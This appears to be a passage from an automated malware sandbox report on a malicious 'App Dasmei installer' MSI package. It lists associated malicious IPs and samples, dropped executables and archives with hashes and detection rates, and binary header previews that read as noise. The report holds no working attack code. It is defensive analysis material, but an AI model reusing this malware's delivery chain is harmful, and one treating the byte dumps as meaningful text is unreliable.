                                                                • 192.210.150.17
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                28a2c9bd18a11de089ef85a160da29e4PVKDyWHOaX.exeGet hashmaliciousUnknownBrowse
                                                                • 34.95.215.169
                                                                RcFBMph6zu.exeGet hashmaliciousUnknownBrowse
                                                                • 34.95.215.169
                                                                http://senalongley.comGet hashmaliciousUnknownBrowse
                                                                • 34.95.215.169
                                                                ghostspider.7zGet hashmaliciousUnknownBrowse
                                                                • 34.95.215.169
                                                                Doc_14-58-28.jsGet hashmaliciousUnknownBrowse
                                                                • 34.95.215.169
                                                                Doc_14-58-28.jsGet hashmaliciousUnknownBrowse
                                                                • 34.95.215.169
                                                                F8HYX5HOgA.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                • 34.95.215.169
                                                                tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                • 34.95.215.169
                                                                JiZQEd33mn.exeGet hashmaliciousUnknownBrowse
                                                                • 34.95.215.169
                                                                urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                • 34.95.215.169
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                C:\Nvidia-59226\Nvidia-59226.exe (copy)PVKDyWHOaX.exeGet hashmaliciousUnknownBrowse
                                                                  RcFBMph6zu.exeGet hashmaliciousUnknownBrowse
                                                                    C:\Nvidia-59226\play.exePVKDyWHOaX.exeGet hashmaliciousUnknownBrowse
                                                                      RcFBMph6zu.exeGet hashmaliciousUnknownBrowse
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):329180
                                                                        Entropy (8bit):6.851354763556334
                                                                        Encrypted:false
                                                                        SSDEEP:6144:weiVnZIYbSVSeiHvf1hwph0lhSMXlBXBW/UhCT:w9VnZHbmSeiHjwph0lhSMXleUUT
                                                                        MD5:E7DDEB065785EB14CF02E4761E3E9AB0
                                                                        SHA1:42C1782DD9F8DD737BB0C53FF59BA2C77575C307
                                                                        SHA-256:B55D64B591D82CA7A00962C4FF9CB9B0AF8559295D9A026AD7820DF4076965DB
                                                                        SHA-512:7F98A40CDCAD276B6A89A7E28E317C60DC5B9290425C172F92C8CEC3E5FC0E45FB0FDF9358D8CD4A80BE75FDDF7FF29B88F44C9DD44B4F146CFAC5204CD64784
                                                                        Malicious:false
                                                                        Preview:...@IXOS.@.....@cM.Y.@.....@.....@.....@.....@.....@......&.{A9CC6EF7-3385-4831-8011-67303F5E511F}..App Dasmei installer..cB1ItKbbhY.msi.@.....@.....@.....@........&.{384277A5-9BB1-41F5-9CA9-30F1AFE51F66}.....@.....@.....@.....@.......@.....@.....@.......@......App Dasmei installer......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]....AI_RemoveAllTempFilesL...AI_RemoveAllTempFiles.@......h...MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........{...{...{.G.x...{.G.~.2.{.G.....{.Vz....{.Vzx...{.Vz~...{.G.z...{...z...{.gyr...{.gy{...{.gy....{.....{.gyy...{.Rich..{.........PE..L...7..f.........."!...'............@........ ............................................@A...............................x...P.......................h:...........g..p....................h.......f..@............ ...............................text...Z................
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                        Category:dropped
                                                                        Size (bytes):8635355
                                                                        Entropy (8bit):7.9998512032284195
                                                                        Encrypted:true
                                                                        SSDEEP:196608:7rj2hoZ9EmTAPP1ZqdCI6EbEWw6kGGW3tk8Y4spTW:7WoZ9EyYZ9ImWopq
                                                                        MD5:4FD14CD23A12A7B1A106165A15C57694
                                                                        SHA1:8102A8EDB0412DF19C624B1EFDE306456A837826
                                                                        SHA-256:5BF7A221A454CC6E6EC1B87D0C370E55C72DA57D3A2635100B5BA84FE6E7D5E3
                                                                        SHA-512:7E0EF66E879772CD21A05658EC3F26419A7E3C5334D8FBD1E73BEE69FF45E2466AEA82CF9CF332A3995CB4F9AA125F667179C4A832DD2679FEDCB47BDA42EB68
                                                                        Malicious:false
                                                                        Preview:PK........;!.Y*..YE..........play.exe.eT.....3. ....Bp....A......<....{.$h...<$..wKXf..s.}..o..;.@........ye.. .....w...m.......?..Rw..M.c.m.*c..`.7.gW'kW3..s3GG'w...4...46.4.jZ4.N..\88.......*...o...... "`!.2...o....!.'..=...q.`...P..........S..`~...F........_.A........|.....8..g.m.>....o_ub{..2..x._...-.......m....aSM.\-....V....?..>........<.K.^.Z.o...........;..".-....$.=....L.R.?.>.Q....._.....c.?.5 ..d....^p.Z.;...e.../.....'.....'/..5...-|...._.5p./...........+:Lb.U.4.SO~S."t)...&........E._....9..@y.}....5.....h..V}..hL. ...$d^T...~..~.*....C.........0 ......m..H?...p..@.....S!..J.o7.~.|......w..S|.BNH.A.V....B.......p|*~c%...%?...F....T%M....;O.9y.77.4.....Z*..`H....H.V.S.......`W.d....%6.,...XlF..gv.s...(.......i.;pulO...8......~....Q.f..D9..~DX=......M.yy.P...=.xa.....7..$6...Fw..Q.wi.5j..}h._.Ho.U.TN..Y.mGyf..)....Tn...PLjq.g.....vf4_.......k.lt.d.}......%.*...O.{B...R-n.'...^.......F'y.....R{...T.0..t.6`.z....P..qtSdtb).....
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):8816544
                                                                        Entropy (8bit):7.993493827980054
                                                                        Encrypted:true
                                                                        SSDEEP:196608:q8NN2mvIbRvnSZkIeQZ8eYMa46OdXxVQIB:qeN2uOnRIIehVQ4
                                                                        MD5:D11828146FF9E2E340C555F9531CAC47
                                                                        SHA1:CA027CA9BEA1E48A0AC4D01370D3F4BC9D5E5088
                                                                        SHA-256:48590573F48E243DEA35B018401933E3B5CBC19EDB94377C7D54394F127E214C
                                                                        SHA-512:2305B6B9A5B530651B33958093B96CCDBEE63D03530A082C39C94809278458658FACA472B66A090493928EC26F6E3D28C8BA278FAF6AC9CB7AFC8AB70A918779
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 24%
                                                                        Joe Sandbox View:
                                                                        • Filename: PVKDyWHOaX.exe, Detection: malicious, Browse
                                                                        • Filename: RcFBMph6zu.exe, Detection: malicious, Browse
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..e...............&.....H......m........ ....@.......................................@.................................8|u......@..y5...........^...)...........................................:..@.............g.0............................text............................... ..`.rdata..@.... ......................@..@.data........0......................@....!Zx......f..@...................... ..`.]#m....H.....g.....................@....2"V....`.... g..................... ..`.rsrc...y5...@...6...$..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                        Category:dropped
                                                                        Size (bytes):8635355
                                                                        Entropy (8bit):7.9998512032284195
                                                                        Encrypted:true
                                                                        SSDEEP:196608:7rj2hoZ9EmTAPP1ZqdCI6EbEWw6kGGW3tk8Y4spTW:7WoZ9EyYZ9ImWopq
                                                                        MD5:4FD14CD23A12A7B1A106165A15C57694
                                                                        SHA1:8102A8EDB0412DF19C624B1EFDE306456A837826
                                                                        SHA-256:5BF7A221A454CC6E6EC1B87D0C370E55C72DA57D3A2635100B5BA84FE6E7D5E3
                                                                        SHA-512:7E0EF66E879772CD21A05658EC3F26419A7E3C5334D8FBD1E73BEE69FF45E2466AEA82CF9CF332A3995CB4F9AA125F667179C4A832DD2679FEDCB47BDA42EB68
                                                                        Malicious:false
                                                                        Preview:PK........;!.Y*..YE..........play.exe.eT.....3. ....Bp....A......<....{.$h...<$..wKXf..s.}..o..;.@........ye.. .....w...m.......?..Rw..M.c.m.*c..`.7.gW'kW3..s3GG'w...4...46.4.jZ4.N..\88.......*...o...... "`!.2...o....!.'..=...q.`...P..........S..`~...F........_.A........|.....8..g.m.>....o_ub{..2..x._...-.......m....aSM.\-....V....?..>........<.K.^.Z.o...........;..".-....$.=....L.R.?.>.Q....._.....c.?.5 ..d....^p.Z.;...e.../.....'.....'/..5...-|...._.5p./...........+:Lb.U.4.SO~S."t)...&........E._....9..@y.}....5.....h..V}..hL. ...$d^T...~..~.*....C.........0 ......m..H?...p..@.....S!..J.o7.~.|......w..S|.BNH.A.V....B.......p|*~c%...%?...F....T%M....;O.9y.77.4.....Z*..`H....H.V.S.......`W.d....%6.,...XlF..gv.s...(.......i.;pulO...8......~....Q.f..D9..~DX=......M.yy.P...=.xa.....7..$6...Fw..Q.wi.5j..}h._.Ho.U.TN..Y.mGyf..)....Tn...PLjq.g.....vf4_.......k.lt.d.}......%.*...O.{B...R-n.'...^.......F'y.....R{...T.0..t.6`.z....P..qtSdtb).....
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):8816544
                                                                        Entropy (8bit):7.993493827980054
                                                                        Encrypted:true
                                                                        SSDEEP:196608:q8NN2mvIbRvnSZkIeQZ8eYMa46OdXxVQIB:qeN2uOnRIIehVQ4
                                                                        MD5:D11828146FF9E2E340C555F9531CAC47
                                                                        SHA1:CA027CA9BEA1E48A0AC4D01370D3F4BC9D5E5088
                                                                        SHA-256:48590573F48E243DEA35B018401933E3B5CBC19EDB94377C7D54394F127E214C
                                                                        SHA-512:2305B6B9A5B530651B33958093B96CCDBEE63D03530A082C39C94809278458658FACA472B66A090493928EC26F6E3D28C8BA278FAF6AC9CB7AFC8AB70A918779
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 24%
                                                                        Joe Sandbox View:
                                                                        • Filename: PVKDyWHOaX.exe, Detection: malicious, Browse
                                                                        • Filename: RcFBMph6zu.exe, Detection: malicious, Browse
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..e...............&.....H......m........ ....@.......................................@.................................8|u......@..y5...........^...)...........................................:..@.............g.0............................text............................... ..`.rdata..@.... ......................@..@.data........0......................@....!Zx......f..@...................... ..`.]#m....H.....g.....................@....2"V....`.... g..................... ..`.rsrc...y5...@...6...$..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):1029120
                                                                        Entropy (8bit):6.678305816647131
                                                                        Encrypted:false
                                                                        SSDEEP:12288:FRPdkIrc+XERSy3beuNcxQWutmAjOWAZlkrpqnuZ9:9stSy3beuuxQfjOWAZarp+u
                                                                        MD5:E851EB9CF465A7018F88254F24E3A57C
                                                                        SHA1:CCB5E4D591C34F7EBCA6AA25BC2162A83A809771
                                                                        SHA-256:33523FAB1FD9ABF767B30E8EA367D65B82E0056ACA41C99BCAD67EDF0B4065D1
                                                                        SHA-512:F41B425DC397A7C4D50B16F2476659897C3980D24227DCB9B876DF4D61036E119C6F7A2099AF23B1D7A5D9EF6480414584822779C451AFA2AFFCBC8B001A9E99
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\.bkp, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...~.Ug..........................................@..........................p...................@...................................@...,.......................J...................................................................................text............................... ..`.itext..X........................... ..`.data....m.......n..................@....bss....._...@...........................idata...............(..............@....didata..............6..............@....edata...............8..............@..@.tls.... ................................rdata..]............:..............@..@.reloc...J.......L...<..............@..B.rsrc....,...@...,..................@..@.............p......................@..@................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):4469
                                                                        Entropy (8bit):7.9571316320314445
                                                                        Encrypted:false
                                                                        SSDEEP:96:+Up2gWAOLZQm72UZzZaJKduTHgYIiG4y7V3dhDByRiLTqr6rgVd4ftVMf7WN:+x9L76UxWuubrIw0Nht+iLTq5dkVMf6
                                                                        MD5:5A750CD5529E43397B98F8985FF50855
                                                                        SHA1:431CA06B861ADD5614FE3C8F2A4A4397AEE33D31
                                                                        SHA-256:A492C278157852772B106A6283A61E7BD179A92D7E19E535F32A4CAC6811A53E
                                                                        SHA-512:668E7AD3E1966F8D5CA2B69F3EEC388942A154E31EED627F7A776BA664BDE52A095A98CDDD1915FF8AF490A0DE280E0DBB817EEC45928B0CFD942ABD03AF4CB6
                                                                        Malicious:false
                                                                        Preview:5D.?VS4R#.bl../..O+.O?W..<3.-..0.dq2:......s...(.l....a:B.-.U..q.wj...........n4.....y.>.i...x.}...F....o...i<..x'.....k.82B.q....CJ..@....D/.N.tbR2\...Y.Ej......].9...N.."Pi.,.&jz....,%?. ....z.y9k..K[D..E.b.~I.].~Z.[..X\......n..u....u.....H....$.(.B..,..|.T.....<.X....oh.P.q..E.C..H...Yz%%.V...l.cB30......%..K0....7.4z..@..,.~~K.|R.D0`...c.y.9e._..y..9.....\E.i:...P?...{.K....Z....Z..^W..=l.A../{!.dZ.\c. V-D.[..)..s...}>..B@...@.0.U(....ud....I.>.;..&.u.+,p@E.g]+.;.sd........#.b..Wb.m..>....[:?Z...$T.V.-..9.`.....(ZB\x ...6.5u...7h.{..J.1...@....7.......|...)...B.....Lu[.....4i.1..'+.t]Z.n.ej..{S.ql...-..=q...q.....?.5..(1...6x..G..'..mYC....2_-]....8.%..%..TgK.:.....XKn..P..h(.c\....o...dZ9k.E...9d.h..`...5..i..$K..K|.C..g.....{B.Q..YZ..5~...L.,+..a.o....a...S.\jG..3...<....K#....25,..6..9!m.c'..K...TW.;.<..-..w..7u..g..p..nM4.L..............;......D....".... .S.A..2..D....(..u.hA ...<:..L..x..c...C.........dz4..b.MI..q.[/{
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2222080
                                                                        Entropy (8bit):6.673754215330406
                                                                        Encrypted:false
                                                                        SSDEEP:24576:ftzlUYIdk3s+wk/RaAXh+RHWAkkplEm7ndM0PnBQSlEKOZvn/nPvrE8EEMbFvMoL:F+Mnm5nmSl+f/SEWIr
                                                                        MD5:B56EEFFDA738C4CCE56FF1B7C1217307
                                                                        SHA1:8AA53BE0DD43C0AFF526D502EFA0677901621F0A
                                                                        SHA-256:0A816F0D086AF82BE414753A735127DEE0A5B2D615C0D3BFF22B5B163206F884
                                                                        SHA-512:5281F948169F32611F121AA2F7103355B2FA19149919ED89AEA65300880C43BA7F6B3FB7796E2FD64CEA80B66D2607A5C945CD347E324227523DDD146B80A566
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....Ug.................Z..........(u............@..........................."..................@...........................P..80....!..H.........................................................................pX...............................text....B.......D.................. ..`.itext..|....`.......H.............. ..`.data....P.......R...^..............@....bss.....a...............................idata..80...P...2..................@....didata.............................@....edata..............................@..@.tls....H................................rdata..]...........................@..@.reloc.............................@..B.rsrc....H....!..H.... .............@..@..............".......!.............@..@................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):133536
                                                                        Entropy (8bit):4.887141700027076
                                                                        Encrypted:false
                                                                        SSDEEP:3072:6xh9iQPz6TYcwoMEFBW1vxzXY8F+0FzWLKH:+9D6TYcwoMEFBW1vTH
                                                                        MD5:79AB86017B2C9B713D6AF08086B1937F
                                                                        SHA1:4214A09A7A12B341B9B5290B448E2A321A1F4566
                                                                        SHA-256:07B5B4156D1F3ADBB7728BA7A7D538AF04E7CCA8E396A19F5446BB2043A6E3DB
                                                                        SHA-512:6BE2C7385C6E2796993D8EAD6CF8B12E0114213E633C902653AA7069E3DC2C4E7354DEF3C8565186140B3F5A59B09E685C9E775C4EC8CF55201A9437E1E15428
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 26%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'.dg................................. ........@.. .......................@.......<....@.....................................S.......H................)... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...H...........................@..@.reloc....... ......................@..B........................H.......|$................................................................(....**.u.......*..0..H.......r...p.(.....r...pr...p.(....r...p.(.....r...pr...p.(......(....-.r...p(....(....o.....rA..p.(....rA..p(.................rG..p.........r...p....r...p(........r...p.........r"..p.........r(..p...(............(........~....-........s.........~.....o....o........o....rT..p.$o..........o........o....rt..p.$o...........o......o....*F(.....(....o....*...0..".......~....,.r...p( ..
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):8192
                                                                        Entropy (8bit):0.35999246155449205
                                                                        Encrypted:false
                                                                        SSDEEP:6:6xNoaaD0JOCEfMuaaD0JOCEfMKQmDmxNoaaD0JOCEfMuaaD0JOCEfMKQmD:HaaD0JcaaD0JwQQzaaD0JcaaD0JwQQ
                                                                        MD5:247B919FE91944A8F0F42F4D079F6E1E
                                                                        SHA1:697E2C22AC489E20FC5D3809A5552CC2DB30C0C1
                                                                        SHA-256:57D0A4F0C75E0516F650A83A1C4CA590CEF68985B639B48F8924487287088387
                                                                        SHA-512:C1FB72FDBBDFBAF9D487B2E9069BCD20286588EA21B6118CB6076C7B3F826F46D97431463BF1D42C23E30BD6055644FEDE46997162F7349DCA99C8594E1A48C3
                                                                        Malicious:false
                                                                        Preview:*.>...........p.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................p.............................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):1310720
                                                                        Entropy (8bit):0.7507521040085875
                                                                        Encrypted:false
                                                                        SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0I:9JZj5MiKNnNhoxum
                                                                        MD5:769F00B64A2BAAC334BC1E027311F76D
                                                                        SHA1:6308CCB2E6E678FB64F935628040441E0BDB26E8
                                                                        SHA-256:192EA0253A8D775FB3143D5B95C70F8B5A16F576B4CB2B5ACC1B016EC565952E
                                                                        SHA-512:4EE66E1A4FA8B615FE39EEAB571A4EC2C95C227B7F40024D3E7DDB28BFB124286F7E0C070E610BC313CE37CA43FD8EECD3200956AFCEBB1497F1CBB09220FE8A
                                                                        Malicious:false
                                                                        Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:Extensible storage user DataBase, version 0x620, checksum 0x3c23dec3, page size 16384, Windows version 10.0
                                                                        Category:dropped
                                                                        Size (bytes):1310720
                                                                        Entropy (8bit):0.6292523817066463
                                                                        Encrypted:false
                                                                        SSDEEP:1536:NSB2ESB2SSjlK/vAH03N9JxM86Ykr3g16b2UPkLk+kDWyrufTRryrCOLUzCJ:NazaNT0EU2UdmOOOL
                                                                        MD5:70C807DC2F91CCEEA9918202F09E026C
                                                                        SHA1:4715BF8EB2825CE6B7DD3515574C4E6E95441A01
                                                                        SHA-256:47980C19F69423075010324297C67FA6A0BE9A9CCC134347A22A8B52F3B449CE
                                                                        SHA-512:1277EADBC3CCB64992CEEB23E93F61C2454529A58DF5DCC1A194612B5E7E62DE66391CC51E64D7E586D2736344E949D50AEA39B53EE9C12248415D509A8E02A5
                                                                        Malicious:false
                                                                        Preview:<#..... .......g.......X\...;...{......................0.o..........|...+...|1.h.g..........|..0.o.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................K-=.....|.................3.tV.....|...........................#......0.o.....................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):16384
                                                                        Entropy (8bit):0.07673586933624589
                                                                        Encrypted:false
                                                                        SSDEEP:3:XllOetYeeEvZUtorB0llgro8+DH92QRzifvmllYllwQXulZMPCyH:vrzVWW0/gUjJ2QVi2/IWQA
                                                                        MD5:F3181B2D70838FA4C02B1BE5FA291555
                                                                        SHA1:8CB6B402267964AE676229C7867518B1859606A1
                                                                        SHA-256:78E49E52FED635D487C4796F33AC2CA3023552FE223B9DFB24C42E3A9118361D
                                                                        SHA-512:F4CBC02E6CF7DAD9E6C70A2106A1B80C7C445EE51C12D783D711C0F697901173D9C3F5AE1FA5111ECDFFA517474AEE31E3B66D21E9595EDE7F080C86247F3842
                                                                        Malicious:false
                                                                        Preview:.Q.......................................;...{...+...|1......|...............|;......|..&k.{.....|..................3.tV.....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Archive, ctime=Sun Dec 8 14:11:22 2024, mtime=Fri Dec 20 13:43:04 2024, atime=Sun Dec 8 14:11:22 2024, length=2222080, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):1325
                                                                        Entropy (8bit):4.555714071220823
                                                                        Encrypted:false
                                                                        SSDEEP:12:889tA/sW0XXlm9e8EXLdp8DCDIE7XJSjN2M2Jt+3mjAumqSyX4iJbdpYoN2M2oYU:83wJ8E7dOEtIqAVqJHd2dpUUxz2yfm
                                                                        MD5:39763955494FBE6F23CCB196F8055703
                                                                        SHA1:63682C6AE41513E286FB3903B07A1BBB99787EF6
                                                                        SHA-256:45B37347653DC0D6026F55DC2164A8AF0ABEDD01372E354753753B829C6E1388
                                                                        SHA-512:65FAF2FC3C484F8E32CF112A08E1D855054C2CAC08379435DA031E49462859011BE74958F95EF46C5D36886D44B89DAD76160ABB7CB3FD3070BA48045EF1537F
                                                                        Malicious:false
                                                                        Preview:L..................F.... ....I.p.I..\.8z.R...I.p.I....!..........................P.O. .:i.....+00.../C:\.....................1......Ycu..PROGRA~2.........O.I.Ycu....................V......r..P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....f.1......Ycu..DASMEI~1..N......Ycu.Ycu....#......................r..D.a.s.m.e.i. .s.u.p.p.o.r.t.....t.1......Ycu..APPDAS~1..\......Ycu.Ycu..........................yI..A.p.p. .D.a.s.m.e.i. . .i.n.s.t.a.l.l.e.r.....h.2...!..Yky .DUMMY_~1.EXE..L......Yky.Ycu....X.........................d.u.m.m.y._.a.p.p...e.x.e.......x...............-.......w...........|..Z.....C:\Program Files (x86)\Dasmei support\App Dasmei installer\dummy_app.exe....d.u.m.m.y._.a.p.p...e.x.e.X.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.D.a.s.m.e.i. .s.u.p.p.o.r.t.\.A.p.p. .D.a.s.m.e.i. . .i.n.s.t.a.l.l.e.r.\.d.u.m.m.y._.a.p.p...e.x.e.<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.D.a.s.m.e.i. .s.u.p.p.o.r.t
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Archive, ctime=Sun Dec 8 14:11:22 2024, mtime=Fri Dec 20 13:43:05 2024, atime=Sun Dec 8 14:11:22 2024, length=2222080, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):1307
                                                                        Entropy (8bit):4.574274053612305
                                                                        Encrypted:false
                                                                        SSDEEP:24:8IwwJ8E7dOEtqzqAVqJkd2dpUUxz2yfm:8Ut7dOOg4Jkd2diG
                                                                        MD5:189F23112648AE539DAC5042F7ED52EC
                                                                        SHA1:91EC1964C73C62A7905F30E1FD733CBAEB5E655C
                                                                        SHA-256:015A059C4192A00817BF2FD94F6C69BA4EF06F2E355CADAC54A5E8E125DD2188
                                                                        SHA-512:BB977CBE311ECB1DA26BC18F6BF9B4F542F57AF7F4172DC14366EDC7BED2DFFBE909495CB9746D7B1CD99FBA8A1BCC062D5DD6233CAA14B9A860F937AA68E7FF
                                                                        Malicious:false
                                                                        Preview:L..................F.... ....I.p.I....z.R...I.p.I....!..........................P.O. .:i.....+00.../C:\.....................1......Ycu..PROGRA~2.........O.I.Ycu....................V......r..P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....f.1......Ycu..DASMEI~1..N......Ycu.Ycu....#......................r..D.a.s.m.e.i. .s.u.p.p.o.r.t.....t.1......Ycu..APPDAS~1..\......Ycu.Ycu..........................L.l.A.p.p. .D.a.s.m.e.i. . .i.n.s.t.a.l.l.e.r.....h.2...!..Yky .DUMMY_~1.EXE..L......Yky.Ycu....X.........................d.u.m.m.y._.a.p.p...e.x.e.......x...............-.......w...........|..Z.....C:\Program Files (x86)\Dasmei support\App Dasmei installer\dummy_app.exe....d.u.m.m.y._.a.p.p...e.x.e.O.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.D.a.s.m.e.i. .s.u.p.p.o.r.t.\.A.p.p. .D.a.s.m.e.i. . .i.n.s.t.a.l.l.e.r.\.d.u.m.m.y._.a.p.p...e.x.e.<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.D.a.s.m.e.i. .s.u.p.p.o.r.t.\.A.p.p. .D.a.s.m
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):38390
                                                                        Entropy (8bit):5.059494658614309
                                                                        Encrypted:false
                                                                        SSDEEP:768:/dbV3IpNBQkj2Uh4iUx1frRJv5FPvlOZhK/bardF9JQOdB4tAHkLNZzNKe1MlYod:/dbV3CNBQkj2Uh4iUx1flJnPvlO2qd/p
                                                                        MD5:A6E5F55E307AD7AAB1BAC2A9EEB35EC4
                                                                        SHA1:4062EA42C9455900824E410BFDDB8F4AE64A67B9
                                                                        SHA-256:BC4EF14D8847B6F788C9345B42E2E3800F921FD0904AB3FA7C2F6F5C0635F9C1
                                                                        SHA-512:B9DA8DE97468EE08D66C7378E35A8AB64769A9EAF32F5695C493241AB2BD800A7B119E179DFD9D31BB7BCCDE8C12D5419E3A77E79BE5866C81C6FD8B8A3F2D36
                                                                        Malicious:false
                                                                        Preview:PSMODULECACHE.7...m.\3.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScr
                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):4469
                                                                        Entropy (8bit):7.9571316320314445
                                                                        Encrypted:false
                                                                        SSDEEP:96:+Up2gWAOLZQm72UZzZaJKduTHgYIiG4y7V3dhDByRiLTqr6rgVd4ftVMf7WN:+x9L76UxWuubrIw0Nht+iLTq5dkVMf6
                                                                        MD5:5A750CD5529E43397B98F8985FF50855
                                                                        SHA1:431CA06B861ADD5614FE3C8F2A4A4397AEE33D31
                                                                        SHA-256:A492C278157852772B106A6283A61E7BD179A92D7E19E535F32A4CAC6811A53E
                                                                        SHA-512:668E7AD3E1966F8D5CA2B69F3EEC388942A154E31EED627F7A776BA664BDE52A095A98CDDD1915FF8AF490A0DE280E0DBB817EEC45928B0CFD942ABD03AF4CB6
                                                                        Malicious:false
